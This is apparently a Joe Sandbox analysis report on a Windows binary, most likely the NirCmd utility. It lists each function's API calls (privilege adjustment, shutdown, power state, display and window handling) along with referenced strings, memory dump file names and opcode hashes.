                                                      • LoadLibraryA.KERNEL32(advapi32.dll,00000000,00000000,0040D9A4,?,?,?,?,?,00000000,?), ref: 0040D8F4
                                                      • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0040D906
                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 0040D921
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: AdjustTokenPrivileges$advapi32.dll
                                                      • API String ID: 145871493-1468017929
                                                      • Opcode ID: d138519ee493b2230bef64027d2425524a1101c5d663b8bc3963f33105991f9b
                                                      • Instruction ID: c68d85fffd68c44b0ab711b937c0fe88b95f618a9e7b60f9ac353f5a49a56c20
                                                      • Opcode Fuzzy Hash: d138519ee493b2230bef64027d2425524a1101c5d663b8bc3963f33105991f9b
                                                      • Instruction Fuzzy Hash: 56E048317021707B82221B966C4CCEFAD69DE8DB617054126F509E2560C6244981D6E9
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,?,0040A4F7,00000000,00000000,00000000,00000000,reboot,force), ref: 0040D9C8
                                                      • GetProcAddress.KERNEL32(00000000,InitiateSystemShutdownA), ref: 0040D9DA
                                                      • FreeLibrary.KERNEL32(00000000,?,?,0040A4F7,00000000,00000000,00000000,00000000,reboot,force), ref: 0040D9FA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: InitiateSystemShutdownA$advapi32.dll
                                                      • API String ID: 145871493-3694336717
                                                      • Opcode ID: e39d563d27479f34b7ba41e2568ac911dadcf8151c2a561a566c1ded7058b63b
                                                      • Instruction ID: b1dd786151b6efa23bbaa3071aa3cecd87003013ca0dddd80b812ad79f5d4e2a
                                                      • Opcode Fuzzy Hash: e39d563d27479f34b7ba41e2568ac911dadcf8151c2a561a566c1ded7058b63b
                                                      • Instruction Fuzzy Hash: 45E0D832705220AB82125FD59C48DDFFE65DBCCB507014426F201E2130C73589C79BDA
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(wininet.dll,?,?,0040A128,?,?,?), ref: 0040DAA3
                                                      • GetProcAddress.KERNEL32(00000000,InternetDialA), ref: 0040DAB5
                                                      • FreeLibrary.KERNEL32(00000000,?,?,0040A128,?,?,?), ref: 0040DAD7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: InternetDialA$wininet.dll
                                                      • API String ID: 145871493-1140072840
                                                      • Opcode ID: 2e211fdf805ea58b72b906c5271e3a5a1d7e0acd2373f0eca31d6d72dc8ba2d0
                                                      • Instruction ID: 00987d0c9695cf7b3aa1c00be420f87b256b0381b609b8b8be4192b2fbca685a
                                                      • Opcode Fuzzy Hash: 2e211fdf805ea58b72b906c5271e3a5a1d7e0acd2373f0eca31d6d72dc8ba2d0
                                                      • Instruction Fuzzy Hash: 84E09235B053116BC7215F91AC04FCB3E55DBC8751F158032F702E16A0CA74CD4A8AA9
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,00000000,00000000,0040D98A,?,?,?,00000000,?), ref: 0040D8B6
                                                      • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 0040D8C8
                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 0040D8E0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: LookupPrivilegeValueA$advapi32.dll
                                                      • API String ID: 145871493-2285166706
                                                      • Opcode ID: 11c3ce75e322bb59fcbb006c9e5098f637649e0e297612a7fc5276d6978ff4ca
                                                      • Instruction ID: 4e079f71e855da7bcfd721fbe88b7553077cccf5ca06609068d04539f95bbb43
                                                      • Opcode Fuzzy Hash: 11c3ce75e322bb59fcbb006c9e5098f637649e0e297612a7fc5276d6978ff4ca
                                                      • Instruction Fuzzy Hash: BAE02632B011506B83222BAA6C488EF7E559AC96017198537F722E2160C7298C869669
                                                      APIs
                                                      • OpenProcess.KERNEL32(00100000,00000000,fI@,00000000,00404966), ref: 004046C3
                                                      • WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 004046D5
                                                      • CloseHandle.KERNEL32(00000000), ref: 004046DC
                                                      • Sleep.KERNEL32(000005DC,00000000,00404966), ref: 004046E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleObjectOpenProcessSingleSleepWait
                                                      • String ID: fI@
                                                      • API String ID: 3687349101-3833387868
                                                      • Opcode ID: 99c742ba41ec4d519e81efbb754845b3f6dc2fbf62c5dbc2aca6217ec7f4fc99
                                                      • Instruction ID: 10c5909f5e96f3544a610ad8ea435030473245de98d7bf4dc58a303f9565a192
                                                      • Opcode Fuzzy Hash: 99c742ba41ec4d519e81efbb754845b3f6dc2fbf62c5dbc2aca6217ec7f4fc99
                                                      • Instruction Fuzzy Hash: D9E0C235846661BBC7221720BC09FCE3EA0AF4EB03F018023F705B01F4CBB849808A9E
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(Userenv.dll), ref: 004044DD
                                                      • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 004044EE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: CreateEnvironmentBlock$Userenv.dll$ljA
                                                      • API String ID: 2574300362-3838505460
                                                      • Opcode ID: 79f5e510a06085e8500188d4c4294cd5053875953387445ec4c2d9df56a2ee47
                                                      • Instruction ID: 6f7bdf27930b1c318b274b237f51eeed017c3af958f8bb65982cea5f9f34ad82
                                                      • Opcode Fuzzy Hash: 79f5e510a06085e8500188d4c4294cd5053875953387445ec4c2d9df56a2ee47
                                                      • Instruction Fuzzy Hash: A8E086B5B44300AFCB108FB0AC446C63FA1BF49350F01C836B106F1560D7B6C140DB09
                                                      APIs
                                                      • memset.MSVCRT ref: 00406C22
                                                      • strlen.MSVCRT ref: 00406C3F
                                                      • atoi.MSVCRT ref: 00406C4B
                                                      • memset.MSVCRT ref: 00406C94
                                                      • _mbscpy.MSVCRT ref: 00406CF7
                                                        • Part of subcall function 004021EA: strlen.MSVCRT ref: 004021FB
                                                        • Part of subcall function 004021EA: strlen.MSVCRT ref: 00402203
                                                        • Part of subcall function 004021EA: _memicmp.MSVCRT ref: 0040221D
                                                        • Part of subcall function 00404B83: GetModuleHandleA.KERNEL32(user32.dll,000001A4,00406CA6,00000000,?,?,00000000,000001A4), ref: 00404B8B
                                                        • Part of subcall function 00404B83: GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00404B9B
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strlen$memset$AddressHandleModuleProc_mbscpy_memicmpatoi
                                                      • String ID:
                                                      • API String ID: 4228955624-0
                                                      • Opcode ID: 53ac7e8ff35fc623f34ee4d4642033c56517c47185007ad607d5252c2fe80b00
                                                      • Instruction ID: 93486615b59a4dde5b44ee2ed2672bf91aa6b726c00e9a91a4cca03e1771d429
                                                      • Opcode Fuzzy Hash: 53ac7e8ff35fc623f34ee4d4642033c56517c47185007ad607d5252c2fe80b00
                                                      • Instruction Fuzzy Hash: 3D2126B19041086FFB14AB11DC81AEE77BCEF51318F1000BFF88AE5081EB39DB858A59
                                                      APIs
                                                      • atoi.MSVCRT ref: 0040ABB6
                                                      • atoi.MSVCRT ref: 0040ABC6
                                                      • DeviceIoControl.KERNEL32(?,00230498,?,?,?,00000003,?), ref: 0040AC09
                                                      • DeviceIoControl.KERNEL32(?,0023049C,?,00000003,?,?,?), ref: 0040AC53
                                                      • CloseHandle.KERNEL32(?), ref: 0040AC65
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ControlDeviceatoi$CloseHandle
                                                      • String ID:
                                                      • API String ID: 1522275157-0
                                                      • Opcode ID: 00662ba5b6ddd49a651b6f1537abed26ab2bd66afbcbb3008dd7de5bca364d26
                                                      • Instruction ID: c1fbd2b0199e4e710ce3a72f730053a8cc1e98a524219f48c5dbd3f8a2324bc5
                                                      • Opcode Fuzzy Hash: 00662ba5b6ddd49a651b6f1537abed26ab2bd66afbcbb3008dd7de5bca364d26
                                                      • Instruction Fuzzy Hash: 0821B2726043989FEF258F358C919FE3FA9EF05344F28402AFD24C2292D275C595CBA5
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00407397
                                                      • GetDesktopWindow.USER32 ref: 004073A3
                                                      • GetWindowRect.USER32(00000000,?), ref: 004073B4
                                                      • GetWindowRect.USER32(?,?), ref: 004073BD
                                                      • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000003), ref: 004074D6
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$Rect$DesktopParent
                                                      • String ID:
                                                      • API String ID: 1797514787-0
                                                      • Opcode ID: 20873b3392aa30aeda10ee117beadd9fb2f1aa9fc0f27b6f1e4a2b6d134fb164
                                                      • Instruction ID: 1b24c4f26a6f93e8f5900f88687527182e7d5d11646069502bb737d8379877e1
                                                      • Opcode Fuzzy Hash: 20873b3392aa30aeda10ee117beadd9fb2f1aa9fc0f27b6f1e4a2b6d134fb164
                                                      • Instruction Fuzzy Hash: 1801E87290001AEFCF01CFE8ED89DEEBB79EB48211B158625E611F6064C774AA019B25
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 0040EC60
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040EC6E
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,0040A031,?,?), ref: 0040EC80
                                                      • SetFocus.USER32(?,?,?,0040A031,?,?), ref: 0040EC8A
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,0040A031,?,?), ref: 0040EC94
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$AttachInput$CurrentFocusProcessWindow
                                                      • String ID:
                                                      • API String ID: 968181190-0
                                                      • Opcode ID: 5509f44d98a4abb7c32a9b48c1c6b10bc692b61a11b05128de335bef44a5ab99
                                                      • Instruction ID: 1b8a40fc8357d425215f64022204e07fffd3e66a9f2521ef5b3618d9f5061f57
                                                      • Opcode Fuzzy Hash: 5509f44d98a4abb7c32a9b48c1c6b10bc692b61a11b05128de335bef44a5ab99
                                                      • Instruction Fuzzy Hash: C8E04F766002157BF6111BA0AD88FBB7E6CDB89B92F008436FB04E21A0C7655C119B79
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040519E
                                                      • RegisterClassA.USER32(?), ref: 004051BA
                                                      • CreateWindowExA.USER32(00000000,?,00411F27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004051D3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ClassCreateHandleModuleRegisterWindow
                                                      • String ID: NirCmdWinCls
                                                      • API String ID: 2379504658-2221025072
                                                      • Opcode ID: 46fc086de171697b51b3eb665449e6144375b78b157ae11fbb237ef700b5b9a2
                                                      • Instruction ID: c82c1a96a14a35a172812571116eca598f6ac073f4e06209f00fb947b8cbc89e
                                                      • Opcode Fuzzy Hash: 46fc086de171697b51b3eb665449e6144375b78b157ae11fbb237ef700b5b9a2
                                                      • Instruction Fuzzy Hash: 46015AB2900218AFCB00DFD8D8C49DFBBBDEB09354B10453BFA05BA250D7B069448BA8
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: memsetstrtolstrtoul
                                                      • String ID: -
                                                      • API String ID: 2460675154-2547889144
                                                      • Opcode ID: 43f6ebea1ea782ffcb0722d5420e5f3076e196a5fad46d9ce7208abec98a23d7
                                                      • Instruction ID: 602ed9324f2744c9d107e5a86e09c88cf1c41581cee0589d10f1f2579150fb35
                                                      • Opcode Fuzzy Hash: 43f6ebea1ea782ffcb0722d5420e5f3076e196a5fad46d9ce7208abec98a23d7
                                                      • Instruction Fuzzy Hash: CB017BB2E4426519EB3165649D1EBE7278C8B50318F1004B7F548321C3E9FC5DC186AA
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _mbscat_mbscpymemset
                                                      • String ID: \
                                                      • API String ID: 1061378040-2967466578
                                                      • Opcode ID: 91959e86200bc444cbac1a960dd5249da237e60ead3debd2c30e14ab15917bba
                                                      • Instruction ID: 6b078a4b7589396cc2cb8d5ca4f88c7a3b16becccc7b2fabc162a5c4c24a63e3
                                                      • Opcode Fuzzy Hash: 91959e86200bc444cbac1a960dd5249da237e60ead3debd2c30e14ab15917bba
                                                      • Instruction Fuzzy Hash: E30125F290420CAAEB21DAA4DD41BCAB7FC9B48304F1000AFA345A3182D674AA844B5D
                                                      APIs
                                                        • Part of subcall function 00401A24: FreeLibrary.KERNEL32(?,00401A96), ref: 00401A2B
                                                      • LoadLibraryA.KERNEL32(mscoree.dll), ref: 00401A9B
                                                      • GetProcAddress.KERNEL32(00000000,LoadLibraryShim), ref: 00401AAD
                                                        • Part of subcall function 00401A39: GetProcAddress.KERNEL32(?,CreateAssemblyCache), ref: 00401A5F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressLibraryProc$FreeLoad
                                                      • String ID: LoadLibraryShim$mscoree.dll
                                                      • API String ID: 2256533930-3672299883
                                                      • Opcode ID: f6ab526f52811d55a2a7d145dad02e2d4a9a22483159d2facdc938cf2fc1eeaa
                                                      • Instruction ID: bcfc0e44bf7d95b5b7574a9df26db9e499187755cb5fa66e02d1df17bda0f60a
                                                      • Opcode Fuzzy Hash: f6ab526f52811d55a2a7d145dad02e2d4a9a22483159d2facdc938cf2fc1eeaa
                                                      • Instruction Fuzzy Hash: CBF0F470711201ABDB20EBF68D4579B76D89F04794F10443AF541E22E1EAB8D940CA6C
                                                      APIs
                                                        • Part of subcall function 0040299D: memset.MSVCRT ref: 004029D3
                                                        • Part of subcall function 0040299D: strtol.MSVCRT ref: 004029FC
                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 0040703B
                                                      • GetProcAddress.KERNEL32(00000000,FlashWindowEx), ref: 00407047
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProcmemsetstrtol
                                                      • String ID: FlashWindowEx$user32.dll
                                                      • API String ID: 606242470-2657433624
                                                      • Opcode ID: 74c0528e6f011b9d6904137f5b2fffc1293369511cdb7383e2855ac9b6c8ccc0
                                                      • Instruction ID: 5acbe37c41395e4f0ef807cd00649b845e68c465a0d7adbada4be9eedd5387d3
                                                      • Opcode Fuzzy Hash: 74c0528e6f011b9d6904137f5b2fffc1293369511cdb7383e2855ac9b6c8ccc0
                                                      • Instruction Fuzzy Hash: BEF08171E0020AAFDB00DFECC8497DEB7B4BB08344F10443AE206F2190D3B99A44CBA5
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 004036C1
                                                      • GetProcAddress.KERNEL32(00000000,ChangeDisplaySettingsExA), ref: 004036D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: ChangeDisplaySettingsExA$user32.dll
                                                      • API String ID: 1646373207-1164668496
                                                      • Opcode ID: 0210f1b14839076db779bfca88d4ebc04b09fcf70d652fb6e82a948da1e85f9d
                                                      • Instruction ID: 19051d83fba880625842f5f947da320450f6c63852da19973e0b5f5f4f9be67e
                                                      • Opcode Fuzzy Hash: 0210f1b14839076db779bfca88d4ebc04b09fcf70d652fb6e82a948da1e85f9d
                                                      • Instruction Fuzzy Hash: DAE0C2317003127BDB604FA1AC04F8B7E989F48B92F154436B605F62F0C66ACD98979D
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(user32.dll,000001A4,00406CA6,00000000,?,?,00000000,000001A4), ref: 00404B8B
                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00404B9B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: EnumDisplayDevicesA$user32.dll
                                                      • API String ID: 1646373207-2278183399
                                                      • Opcode ID: e86a95abb8f845ce19847a9f7263b48153abb35040a8311d0c90c0bf973016aa
                                                      • Instruction ID: 4961fb83d3309bd57a05f6b1f65cfcb77a418269fc7555c0c9d5b8969bddb217
                                                      • Opcode Fuzzy Hash: e86a95abb8f845ce19847a9f7263b48153abb35040a8311d0c90c0bf973016aa
                                                      • Instruction Fuzzy Hash: C5D02B3170223027862197A06D08ECFBDD5AF84B803040922FA05E1054C3788E8047C8
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,0040BDB6,00000001,SeShutdownPrivilege,?,force,?,standby,?,runas,?,elevatecmd,?,elevate), ref: 0040DA0D
                                                      • GetProcAddress.KERNEL32(00000000,SetSystemPowerState), ref: 0040DA1D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: SetSystemPowerState$kernel32.dll
                                                      • API String ID: 1646373207-2693784556
                                                      • Opcode ID: 41c876d01532474c65fe2bd678b38e02ae3497a50cd94dbb1678c1d9e49c5de0
